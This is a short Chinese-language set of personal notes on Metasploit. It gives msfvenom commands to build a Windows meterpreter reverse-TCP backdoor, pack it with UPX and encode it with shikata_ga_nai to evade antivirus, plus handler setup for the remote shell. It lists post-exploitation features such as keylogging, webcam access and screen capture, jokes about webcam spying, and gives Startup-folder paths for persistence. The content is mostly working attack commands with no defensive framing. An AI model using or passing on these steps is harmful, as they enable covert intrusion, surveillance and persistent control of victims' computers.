前辈的msf笔记

//制作简易后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=x -f exe > x.exe
//简单加壳:upx 文件名
#use exploit/multi/handler
#set PAYLOAD windows/meterpreter/reverse_tcp
#set LHOST x.x.x.x
#set LPORT x
#exploit
//若要对外网使用,则需要开启端口转发
免杀:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '/x00' LHOST=x.x.x.x LPORT=x -f exe > x.exe
/* 注释 格式
-i 编译次数 -i 数字(123)
-p payload -p 路径(xx/xx)
-e 编译方式 -e 路径(xx/xx)
-b 编译中需要剔除的值 -b 字符('str_')
-f 生成格式 -f 格式(*.*)
*/
//连接成功后 可使用help获取可操作的命令 keyscan开头这个是键盘记录相关的 shell是运行目标机子命令行 webcam是摄像头相关(说到这里忍不住笑)
//还发现了些手机获取通话记录、短信的命令,就不详细说了 help里面都有,upload 文件名 是上传文件
//run vnc是获取屏幕图像 会被杀软轻松解决,所以这个最好自己加个壳或者免杀
/*
持久性后门开机启动方法就是将其复制到Windows的启动文件夹,
XP或更低版本 :C:\Documents and Settings\XXX\Start Menu\Programs\StartUp
Win7以上通用路径C:\Users\XXX\Start Menu\Programs\StartUp
Win8以上通用路径C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
路径中"XXX"为用户名 管理员一般为 Administrator
Windows下带空格的路径不能直接打,要加上双引号,Linux&&Unix下的要加上单引号,否则空格后的东西会被认为是命令参数 会报错
举例
Windows:
读取到开始菜单
cd "C:\ProgramData\Microsoft\Windows\Start Menu"
Linux&&Unix
读取到root用户下的"1 2"文件
cd '/root/1 2'